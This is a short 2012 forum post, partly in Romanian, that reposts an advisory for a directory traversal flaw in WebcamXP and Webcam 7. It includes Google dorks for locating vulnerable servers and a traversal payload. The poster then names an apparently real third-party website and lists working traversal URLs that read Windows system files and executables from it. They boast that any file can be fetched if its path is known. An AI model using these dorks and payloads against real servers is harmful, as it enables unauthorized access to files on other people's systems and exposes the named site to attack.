crys18 Posted February 23, 2012 Report Posted February 23, 2012 # Exploit Title: WebcamXP and Webcam7 Directory Traversal Vulnerability# Google Dork: "powered by webcamxp" xhtml css# Google Dork: "powered by webcam 7"# Date: 2/22/2012# Author: Silent Dream# Software Link: http://dl.filekicker.com/send/file/230775-FQAC/wlite550.exe# Software Link: http://dl.filekicker.com/send/file/226161-G6BD/w7inst.exe# Version: WebcamXP 5.5.1.2, Webcam 7 v0.9.9.32# Tested on: Windows XP# Similar to CVE: 2008-5862 but uses backslashes instead of encoded forward slashes.http://ip:8080/..\..\..\..\..\..\..\..\..\..\..\boot.iniIn fine am facut ceva teste si am si gasit ceva siteuri vulnerabile.ex:http://dangkiem.comPrin acest exploit pot accesa fisiere din serverul respectiv.ex:http://dangkiem.com:8085/../..\..\..\..\..\..\..\..\..\..\..\Windows\win.inihttp://dangkiem.com:8085/../..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini..................http://dangkiem.com:8085/../..\..\..\..\..\..\..\..\..\..\..\Windows\Explorer.exehttp://dangkiem.com:8085/../..\..\..\..\..\..\..\..\..\..\..\Program Files\Windows Media Player\wmplayer.exe..................Cam absolut orice daca stim unde se afla si cu ce nume. Quote